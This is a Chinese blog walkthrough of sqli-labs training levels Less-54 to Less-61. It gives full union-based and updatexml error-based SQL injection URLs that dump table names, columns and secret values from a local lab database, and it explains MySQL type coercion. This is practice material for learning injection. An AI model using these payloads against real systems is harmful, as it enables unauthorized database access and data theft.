sqli-labs实战记录(四)

Less-54

从这一关开始就开始限制次数,而且数据库也换成了challenge,表名是随机的,超过次数就会重新安排
代码审计发现是简单的单引号闭合

1
$sql="SELECT * FROM security.users WHERE id='$id' LIMIT 0,1";

爆表

1
http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

爆列

1
http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='XG5G593V9H'%23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-54/?id=-1' union select 1,secret_0IMA,3 from XG5G593V9H where id=1%23

提交获得的信息重置刷新次数

Less-55

这次变成了14次
先构造测试一下

1
http://192.168.100.105/sqlilabs/Less-55/?id=1) %23

爆表

1
http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

爆列

1
http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_name='8753JZ68TI' %23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-55/?id=-1) union select 1,secret_UL8C,3 from 8753JZ68TI %23

提交重置次数

Less-56

构造一下
http://192.168.100.105/sqlilabs/Less-56/?id=1" %23回显成功后来一直拿他试结果失败了
看了源代码才知道原来是括号+单引号的闭合
找了一下原因

1
SELECT * FROM security.users WHERE id=('1"#') LIMIT 0,1

在数据库中执行确实能够查到数据,那么问题在哪呢?

查找资料后发现,mysql在运算过程中能够自动的把数字转化为字符串,而在比较运算中,如果是数字和字符串比较,则可以自动的把字符串转为数字,转换的时候如果首字符字符是数字,则会转换为相应的数字,例如‘1”#’转化为数字值为1,如果是‘11fads’则为11,不过必须是数字和字符串比较的时候才会转换,如果都是字符的话则不会这样。

1
http://192.168.100.105/sqlilabs/Less-56/?id=-1') %23

这样才对
爆表

1
http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

爆列

1
http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='HVL992XP27'%23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-56/?id=-1') union select 1,secret_E2BQ,3 from HVL992XP27%23

提交重置次数

Less-57

尝试一下闭合
http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,2,3 %23发现这个有回显,常规套路
爆表

1
http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

爆列

1
http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,group_concat(column_name),3 from information_schema.columns where table_name='YRA6E572GR' %23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-57?id=-1" union select 1,secret_LA1G,3 from YRA6E572GR %23

提交重置次数

Less-58

这一关变成了5次
但是一侧就测试出来是单引号的闭合
执行以后发现不可以用union注入。。。因为不返回任何有数据库里面的信息
这段代码对其进行了处理

1
2
3
4
5
$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");
$pass = array_reverse($unames);
echo 'Your Login name : '. $unames[$row['id']];
echo "<br>";
echo 'Your Password : ' .$pass[$row['id']];

下面有报错我们可以利用报错注入
爆表

1
http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) --+

爆列

1
http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='XXQT0FJQL2'),0x7e),1) --+

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-58/?id=1' and updatexml(1,concat(0x7e,(select secret_LVSS from XXQT0FJQL2),0x7e),1) --+

提交重置次数

Less-59

同样的报错注入,只需要加个注释,什么单引号双引号闭合都没有
爆表

1
http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

爆列

1
http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='CA4PGB5VU5'),0x7e),1)%23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-59/?id=1 and updatexml(1,concat(0x7e,(select secret_O5UY from CA4PGB5VU5),0x7e),1)%23

提交重置次数

Less-60

这一次是双引号+括号的闭合
爆表

1
http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

爆列

1
http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='ZIYD79H66Q'),0x7e),1)%23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-60/?id=1") and updatexml(1,concat(0x7e,(select secret_JIPP from ZIYD79H66Q),0x7e),1)%23

此题完结

Less-61

这次是单引号+两个括号的闭合,也是够变态的
爆表

1
http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)%23

爆列

1
http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='0NCH5HWI5Q'),0x7e),1)%23

爆详细信息

1
http://192.168.100.105/sqlilabs/Less-61/?id=1')) and updatexml(1,concat(0x7e,(select secret_6IKU from 0NCH5HWI5Q),0x7e),1)%23

完结

Less-62-Less65

都是一样的都需要盲注,但是给的次数太少,很难跑出来,等我算法学得好一点再去把脚本写出来吧

小结

终于把这个SQL注入的平台的题目给做完了,最近感冒难受的一批。。。撒花~~~


听说,打赏我的人最后都成了大佬。



文章目录
  1. 1. Less-54
  2. 2. Less-55
  3. 3. Less-56
  4. 4. Less-57
  5. 5. Less-58
  6. 6. Less-59
  7. 7. Less-60
  8. 8. Less-61
  9. 9. Less-62-Less65
  10. 10. 小结